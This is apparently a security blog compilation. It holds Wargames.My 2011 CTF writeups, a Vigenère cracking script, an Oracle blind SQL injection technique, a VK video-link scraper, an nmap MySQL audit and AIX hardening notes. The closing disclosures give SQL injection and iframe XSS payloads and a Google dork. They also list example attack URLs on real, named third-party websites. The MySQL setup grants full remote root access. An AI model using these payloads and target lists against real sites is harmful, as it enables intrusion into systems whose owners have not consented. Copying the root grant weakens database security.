Wargames.My 2011 - crypto200

 Above is the ciphered words given to the players. What the players need to do? Decode it,simple :P Google images for "logo cipher" or "code image". And lots of images with their own cipher code from the images. Find the one that similar to the crypto200.png There are some that you can list in. 1 - freemason cipher 2 - pigpen cipher 3 - more.. I chose pigpen cipher since that's the most similar to the crypto200.png.. My friend said it is ok to chose either one since the next step after deciphering this cipher is the real challenge. once decode it to words,this is what i got

ndeunf ofqugzdg cdru kuus zdpul
dsl giyisp uatvsuseiannf ev kgisp
lvzs ovgghtecl pvrugswusey dsl eh
ogudeu egdsytdgusof dsl kgispisp
tvzug kdom ev ecu tuvtnu!zlugu
ecugu iy sv riyivs,ecu tuvtnu zinn
tugiyc

svz dsyzug;zcioc pgvht zdy gfds
onudgf doohyul vx ev ku dyyvoideul
ziec?wl5 ecudsyzug dsl yhkwie ecu
yhw.ecde iy fvhgxnp.

End? not yet! you still need to decode the 2nd cipher,Substitution Cipher! Here's a wikilink for this cipher. how this cipher works? here's an example rabbit - real words. so the person who want to send this message want to cipher it,so he substitute letter r = x, a = w, b = e, i = k, t = u so the rabbit,once ciphered will become xweeku. so,how to get the real answer for this challenge? reverse the decoded words up there :P thanks.

Wargames.My 2011 - crypto100

Crypto100
Players given this code.

fvrwslwslswhgacsremfberbubgrihgbtvi

Hint given was : I like big,long and yellow
the first thing came in my mind once read the hint was = banana!!..so the answer/passphrase should be monkey.

I googled a little bit about type of ciphers that need a passphrase/key to decrypt it.
I found vignere ciphers.Then try to use online cracker available to crack it, and wollah~ lucky me :D
Flag is = themonkeyisjumpingaroundinthejungle


Here's a python code made by johnburn to solve this challenge. its a dictionary attack btw.

#!/usr/bin/python
charset   = 'abcdefghijklmnopqrstuvwxyz'
encoded = 'fvrwslwslswhgacsremfberbubgrihgbtvi'

keys = open("wordlist.txt", "r")
for key in  keys.read().split('\n'):
    message = ''
    for i in range(len(encoded)) :
        p = charset.index(encoded[i])
        k = charset.index(key[i % len(key)])
        if k - p < 0 :
                   message += charset[((p - k) + 26) % len(charset)]
        else :
                   message += charset[(p - k) % len(charset)]
    if message[:-2].count('the')>1:
        print 'The key: ' + key        
        print 'The message: ' + message
        break

Wargames.My 2011 - writeups

This year there'll be another online ctf games a.k.a wargames in malaysia.Thanks to hackerspace community + TheSexyKambing
http://wargames.my/wgmy2012/
Last year,the game dominated by Kueytiow. He/She manage to solve two binary bonus challenge which made him started the game in a comfort zone.
Can view the last year result here
result

So for those that have interest to join this year wargames do register ASAP.

In my blog I'm gonna share with you some of the writeups for the previous challenge.

Web100
Available in wargames website, web100 writeups

Forensic200

OHMAIGAWD! It seems like we've been hacked! But what did the hackers 
steal? From the logs, it seems like they exploited an SQL injection bug 
on our website. Help us find the name of the database that they stole 
and we shall reward you handsomely.

So players were given with a log to analyze them. You can get it here
From the logs, the attacker just use an automated tool;sqlmap to exploit the web. The injection use Blind technique. If you are good enough in Blind SQL injection,you should get the flag in less than a minute :) goodluck.
Flag = wgmy2011

more will be in my next post...hopefully :P

Advance Oracle Blind SQL Injection

Had a job to test an application few days back. Its an application using java applet.
Hurm..when I heard its an application via java applet what came in my mind

1 - Internet Explorer will be a better browser 
*which is true in this case..since to use other browser I need to install Java jiniator(something like that)
*no extra addon such as hackbar/tamper data available in IE

2 - Try to hook using proxy tools burp/paros/webscarap/zap etc.
*Success,but no use. Since the data is encrypted well. Failed to crack/reverse them :(
*Tried to use JavaSnoop. Failed to setup it.hahaha

3 - Manual testing!!!
* The best choice.

The developer of this application really confident with their applications. They already guaranteed that there's no bug in their application. So that's why the company that hire them asked me to test the application..

So,after tested it for the 1st day..it is true the application is hard to hack..not because the application,but because the java applet.
How about the application then? LOTS of vulnerability.
I found multiple forms that vulnerable to Oracle Blind SQL Injection.

Then came another problem.
Most of the forms only accept a little amount of characters. some of them accept 30chars..some of them 40chars..the longest acceptable chars is 90chars where I found in one of the vulnerable form.

It is a BLIND SQLI with limitation of characters.

At first I already informed this to the company,but then one of the developer said that..
"So what?..You cannot extract anything just by that 1 or 1=1 1=2 thing right?haha"

Really pissed me off. So I need to extract something from this Blind Sqli to show the impact to this developer guy.

A little of reading and googling found that, for Blind Sqli in Oracle,we need a lots of chars to successfully extract the data.
The only hope I have now is the only form that accept 90chars.

So the how I'm confident it is a blind sqli?
Simple.
When I'm trying to search for " john ", the result of john's profile will appear.
but if I try to search for " john' ", a different profile or a blank profile appear.

So I tried
john' or 1='1 TRUE
john' or 1='2 FALSE

yerp! it is a blind sqli.

Had a read in pentestmonkey cheat sheet and found out that we can use like this as well. called String Concatenation


jo'||'hn = TRUE
jo'||hn = FALSE
jo'||h||'n = TRUE

So here's the idea.

jo'|| INJECTION HERE if TRUE 'h' else 'x' || 'n

- let say we query to find a first letter of current_user='U' ,so if the current_user's first letter start with U,it will be 'h' which completed the string equals jo'||h||'n
- if the 1st letter not start with U, it will be else 'x'..so the string become jo'||x||'n which is not a valid profile available in the application.

hope you get the idea :)

thanks to
-pentestmonkey
-Bojan Zdrnja

VKDownloader Python Script

VK is the largest European social network with more than a 100 million active users. It's similar to facebook. There's a video section where we can stream or download it.
Here's a simple python script to grab the download link for the video you want.

#!/usr/bin/python

import sys, re, urllib2


if len(sys.argv) < 2:
    print """    
      ## Usage : python vkdownloader.py "Url" ##
    --------------------------------------
        ## by p0pc0rn 2012 ##

          
    
          """
    sys.exit(0)

url = sys.argv[1]
url2 = sys.argv[1]
url3 = sys.argv[1]

find = re.compile("var video_host = '(.*?)';")
find2 = re.compile("var video_uid = '(.*?)';")
find3 = re.compile("var video_vtag = '(.*?)';")
data = urllib2.urlopen(url).read()
data2 = urllib2.urlopen(url2).read()
data3 = urllib2.urlopen(url3).read()
result = find.search(data)
result2 = find2.search(data2)
result3 = find3.search(data3)

print 'Download link for 360p => ' + result.group(1) +'u'+result2.group(1)+'/video/'+ result3.group(1)+'.360.mp4'
print 'Download link for 480p => ' + result.group(1) +'u'+result2.group(1)+'/video/'+ result3.group(1)+'.480.mp4'
print 'Download link for 720p => ' + result.group(1) +'u'+result2.group(1)+'/video/'+ result3.group(1)+'.720.mp4'

Save the code as vkdownloader.py. You'll need python of course to run the script :)

How to use?
1 - Grab the video URL by right click on the video and copy url code.

2 - Paste the link as the instruction in the script.

3 - The results will be appear for 360,480, and 720 version.( not all video supported for higher resolution )

4 - Copy the link and you can download using your download manager.

Thanks,
p0pc0rn

Auditing MySQL Server Using Nmap

 What you really need in your local pc are
1 - nmap installed
2 - mysql-audit.nse which can be downloaded here
3 - mysql-cis.audit can be downloaded here

before proceed,you need to ensure that the server already allow your IP for checking.How?
Ask the server owner/admin to grant access to your IP.A simple method like below

$ mysql -u root -p
Enter password:

mysql> use mysql

mysql> GRANT ALL ON *.* to root@'your-pc-ip' IDENTIFIED BY 'your-root-password';

mysql> FLUSH PRIVILEGES;

once done, now you can proceed with nmapping.

C:\Users\user0s>nmap -p 3306 192.168.56.101 --script mysql-audit --script-args "mysql-audit.usernamee='root',mysql-audit.password='mysql-password',mysql-audit.filename='C:\Program Files\Nmap\nselib\data\mysql-cis.audit'"

Thanks to Patrik Karlsson because of his contribution on this nmap scripts :)

AIX IP Stack Tuning

Having problem during AIX Server Assessment/Hardening recently. After a few googles,found this great blog

http://www.cymru.com
helps a lot in my assessment.

1. TCP send and receive spaces

The TCP send and receive spaces directly effect the TCP window size parameter. An increased window size will allow for more efficient transfers, particularly bulk transfers such as FTP and HTTP. The default for each is not optimal, and should be increased to 32768 bytes. This value should not be increased above 64K bytes unless the implications of RFC1323 and RFC2018 are fully understood and support for both is enabled.

Do not enable RFC1323 without also enabling support for RFC2018. Remember, pipe drain is a Bad Thing[tm].

A. AIX
    /usr/sbin/no -o tcp_sendspace=32768
    /usr/sbin/no -o tcp_recvspace=32768
   
2. Socket queue defense against SYN attacks

While great effort is undertaken to defend any network from those with malicious intent, several ports (largely TCP) must remain open to conduct business. Internet vandals may attempt to exploit these ports to launch a denial of service attack. One of the most popular attacks remains the SYN flood, wherein the socket queue of the attacked host is overwhelmed with bogus connection requests. To defend against such attacks, certain UNIX variants maintain separate queues for inbound socket connection requests. One queue is for half-open sockets (SYN received, SYN|ACK sent), the other queue for fully-open sockets awaiting an accept() call from the application. These two queues should be increased so that an attack of low to moderate intensity will have little to no effect on the stability or availability of the server.

A. AIX
    /usr/sbin/no -o clean_partial_conns=1
    This setting will instruct the kernel to randomly remove half-open sockets from the q0 queue to make room for new sockets.

3. Redirects

A miscreant can use IP redirects to modify the routing table on a remote host. In a well-designed network, redirects to the end stations should not be required. Both the sending and accepting of redirects should be disabled.

A. AIX
    /usr/sbin/no -o ipignoreredirects=1
    /usr/sbin/no -o ipsendredirects=0
   
4. ARP cleanup

It is possible for a miscreant to create a resource exhaustion or performance degredation by filling the IP route cache with bogus ARP entries. In Solaris, there are two parameters that govern the cleanup interval for the IP route cache. For unsolicited ARP responses, the parameter to be tuned is arp_cleanup_interval. In AIX, the cleanup interval is governed by the value of arpt_killc. However, this parameter governs both solicited and unsolicited ARP entries. For this reason, it is likely best to leave the parameter at the default setting of 20 minutes.

A. AIX
    /usr/sbin/no -o arpt_killc=20

5. Source routing

With source routing, an attacker can attempt to reach internal IP addresses - including RFC1918 addresses. It is important to disable the acceptance of source routed packets to prevent subtle probes of your internal networks.

A. AIX
    /usr/sbin/no -o ipsrcroutesend=0
    Disable the sending of source routed packets.

    /usr/sbin/no -o ipsrcrouteforward=0
    This is important if the box is routing, e.g. a firewall. Disable this feature to prevent the host from forwarding source routed packets.

6. TIME_WAIT setting
On a busy web server, many sockets may linger in the TIME_WAIT state. This is caused by improperly coded client applications that do not properly shut down a socket. This can also be used as a type of DDoS attack.

A. AIX
    No tuning recommendations.

7. Broadcast ECHO response
Smurf attacks work by sending ICMP 8 0 (ECHO REQUEST) messages to a broadcast address from a spoofed address. Some IP stacks will respond, by default, to such messages. This should be disabled. Further, if the host is a firewall (router), it should not propogate directed broadcasts.

A. AIX
    /usr/sbin/no -o directed_broadcast=0
    Do not respond to directed broadcasts.

8. Other broadcast probes

There are two other broadcast probes that a miscreant could utilize against a network. The address mask query can be used to map out the size of the netblock, and set a range for further probes. The timestamp broadcast is another means of mapping and fingerprinting hosts.

A. AIX
    /usr/sbin/no -o icmpaddressmask=0
    Prevent address mask queries.

other references that might helps during AIX Assessment/Hardening

http://abstractinitiative.com/PerformanceJungle/2009/09/aix-security-hardening-script/

http://publib.boulder.ibm.com

http://www.boran.com/security/sp/aix_hardening.html

http://www.ncftp.com/ncftpd/doc/misc/ephemeral_ports.html

http://slashzeroconf.wordpress.com/2008/01/20/unix-password-selection-expiration/

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    :  http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type     :    Web Application

Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnetable to SQL Injection.
Proof of concept ::

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by      : p0pc0rn

http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]

~/p0pc0rn/~

Light & Shade Creative Studio web design multiple sql injections

Title : Light & Shade Creative Studio web design multiple sql injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/

[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'

~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com

[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~